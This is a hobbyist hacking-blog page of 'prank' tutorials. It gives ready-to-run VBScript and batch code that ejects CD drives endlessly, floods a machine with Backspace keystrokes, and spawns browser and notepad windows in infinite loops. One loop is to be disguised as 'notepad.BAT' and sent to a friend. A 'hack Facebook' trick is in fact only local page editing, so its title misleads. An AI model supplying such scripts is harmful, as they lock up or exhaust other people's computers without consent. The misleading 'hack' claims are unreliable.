Showing posts with label Funny prank tricks. Show all posts
Showing posts with label Funny prank tricks. Show all posts

Wednesday, February 22, 2012

Computer Pranks | Eject Your CD-DVD Drives Infinitely

This tutorial explains how to make vb script that eject your CD-DVD drives …. infinitely.

1) Run Notepad

2) Copy and Paste VB script code into notepad

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

3) Save as name_what_ever_you_want .vbs , for example ejectCD.vbs

Saturday, December 31, 2011

>Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key:-

Code:-

MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Save as "hack.bat"

Friday, December 30, 2011

Ebomb a prank code for fun

This is a simple attack that enables running multiple applications in victims pc just to play fun on him. 
There are many ways to make ebomb but this is the most easiest way to do it. Simply open notepad and type-

 
 
The code:-
@echo off
:START
msg * "Sorry buddy but you just messed up yourself"
start iexplore " kumaranvr.blogspot.com "
start firefox " www.google.com "
start notepad
start iexplore " facebook.com "
start firefox " facebook.com/hackersgrp "
start notepad
GOTO START

Monday, December 26, 2011

Play this Funny prank in your friend’s computer

Type the code in notepad as:-

@ECHO off
:top
START
%SystemRoot%\system32\notepad.exe
GOTO top

Save it as “notepad.BAT” and send it.

>Note: 

Wednesday, December 21, 2011

Funny Trick To Hack Facebook

You can edit content of any website including facebook, myspace, twitter etc:-

>> How to perform this trick?

Open any website of your choice (like facebook) in browser (internet explorer,google chrome,firefox) and clear the address bar of the browser.

Copy paste the following javascript code in the address bar of your browser->

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

And that's it. Now you can edit anything that is written on the page.

>> How this trick actually work?

 
Design by Secure Hackers